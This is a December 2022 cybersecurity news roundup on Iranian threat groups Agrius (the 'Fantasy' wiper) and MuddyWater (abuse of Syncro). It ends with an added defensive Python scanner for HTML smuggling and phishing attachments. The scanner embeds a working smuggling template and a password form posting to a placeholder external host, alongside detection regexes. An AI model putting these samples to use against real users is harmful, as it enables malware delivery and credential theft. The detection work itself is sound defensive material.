Recent Iranian cyber operations.
Dec 12, 2022

Discussion of Iranian cyber operations, with particular attention to the Agrius and MuddyWater threat groups.


Researchers are discussing recent activity of Iran-linked threat actors, some of which are using a new data wiper, while others are updating a remote administration tool.

The Fantasy data wiper is all too real.

Bleeping Computer reports that a new data wiper, dubbed “Fantasy,” has been seen in use by the Agrius APT group in supply-chain attacks against targets in Israel, Hong Kong, and South Africa. The campaign reportedly began in February of this year and took hold in March, victimizing an IT support services firm, a diamond wholesaler, a jeweler, and an HR consulting company. According to analysts from ESET, the new wiper is an evolution of the “Apostle” wiper previously seen in use by the group. Anand Revashetti, CTO and Co-Founder of Lineaje, says that the use of this data wiper underscores the importance of software supply chain security: “The ‘Fantasy’ data wiper that was deployed by an Israeli software developer is just the latest example of why CISOs need to make software supply chain security a top priority in the upcoming year. Gartner has already predicted that by 2025, 45% of organizations worldwide will experience attacks on their software supply chains, which is a three-fold increase from 2021. To combat it, organizations need to know what’s in their software to not only discover risks, but to be more proactive in mediating the threats they impose. That is why it’s critical to have solutions that help consumers analyze the software supply chain and avoid deployment of unknown and malicious components hidden in legitimate software.”

MuddyWater and Syncro.

Iran-affiliated threat group MuddyWater has been observed by Dark Instinct researchers abusing a new remote administration tool, known as Syncro, against target devices, Dark Reading reports. Syncro is a managed service provider (MSP) platform that replaced the group’s previous remote administration tool, “RemoteUtilities,” which was seen in use in September. The Hacker News says that the software gives the operators complete remote control of a compromised machine, enabling reconnaissance, the installation of backdoors, and the sale of access to outside actors.

We heard from Cofense on the campaign. “Spear-phishing continues to be the intrusion vector of choice for many advanced threat groups, and although users may often not see themselves as important targets, they can easily become a stepping stone toward the real target. Advanced persistent threat actors are definitely persistent in more ways than one, and will often expend significant effort in open-source research to identify an important target’s social and professional network. If they can compromise just one email account belonging to someone in that network, they are able to abuse established trust by sending phishing emails from that account to the final target or to other ‘stepping stones,’ as reportedly done in the MuddyWater campaign against Egyptian hosting companies,” said Joe Gallop, Cyber Threat Intelligence Manager at Cofense. “The use of HTML attachments (as seen in this campaign) is not new, but Cofense Intelligence has observed some notable spikes in HTML attachment phishing recently. The use of HTML smuggling (legitimate HTML5 and JavaScript capabilities in an HTML attachment to deliver embedded malicious content) is done after the file has been opened on the target computer, rather than beforehand, by operators of Qakbot malware, which is our ‘phishing malware family to watch’ for this quarter. HTML attachments are used to harvest credentials without ever sending the victim to a website, by abusing legitimate form-submission services. It is important for security teams to train all users to recognize these and other ways in which threat actors make use of HTML attachments in phishing, or risk missing an evasive and successful form of phishing.”
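As an added example (not from the article or from Cofense), a defender-side heuristic scan of HTML attachments for the two patterns Gallop describes: script-side file assembly from an embedded base64 string (HTML smuggling, which only produces the file after the attachment is opened) and a credential form that posts straight to an external form-submission service. The sample attachments, the placeholder domain and the indicator names are constructed for this illustration.

```python
import re
import base64

# Constructed smuggling-style attachment: the "payload" is harmless text, embedded as base64
# and turned into a downloadable file by script only after the attachment is opened.
SMUGGLING_SAMPLE = """<html><body><script>
var b64 = "%s";
var bytes = Uint8Array.from(atob(b64), c => c.charCodeAt(0));
var blob = new Blob([bytes], {type: 'application/octet-stream'});
var a = document.createElement('a');
a.href = URL.createObjectURL(blob); a.download = 'document.bin'; a.click();
</script></body></html>""" % base64.b64encode(b"constructed harmless payload " * 40).decode()

# Constructed benign attachment: static content, no script-side file assembly.
BENIGN_SAMPLE = "<html><body><h1>Quarterly report</h1><p>See attached figures.</p></body></html>"

# Constructed credential form posting to a third-party form relay (placeholder domain).
FORM_SAMPLE = """<html><body><form action="https://form-relay.example/submit" method="post">
<input name="email"><input name="password" type="password"><input type="submit"></form></body></html>"""

# Each indicator is a cheap static signal; the verdict needs a combination, not a single hit.
INDICATORS = {
    "decodes_base64_in_script": re.compile(r"\batob\s*\("),
    "builds_file_in_browser": re.compile(r"\bnew\s+Blob\s*\(|msSaveOrOpenBlob|createObjectURL"),
    "forces_download": re.compile(r"\.download\s*=|\bdownload\s*=\s*['\"]"),
    "large_embedded_base64": re.compile(r"['\"][A-Za-z0-9+/]{400,}={0,2}['\"]"),
    "external_form_post": re.compile(r"<form[^>]+action\s*=\s*['\"]https?://", re.I),
    "password_field": re.compile(r"type\s*=\s*['\"]password['\"]", re.I),
}

def scan_html_attachment(html: str) -> dict:
    """Return the matched indicators and a verdict for one HTML attachment body."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    smuggling = {"decodes_base64_in_script", "builds_file_in_browser"} <= set(hits)
    harvesting = {"external_form_post", "password_field"} <= set(hits)
    if smuggling:
        verdict = "html_smuggling"
    elif harvesting:
        verdict = "credential_form"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": hits}

if __name__ == "__main__":
    for label, sample in [("smuggling", SMUGGLING_SAMPLE), ("benign", BENIGN_SAMPLE), ("form", FORM_SAMPLE)]:
        print(label, scan_html_attachment(sample))
```

Run against attachments stripped from a mail gateway quarantine; a "suspicious" verdict (one pattern alone) is a triage cue rather than a block decision, since legitimate HTML mailers also embed base64 images.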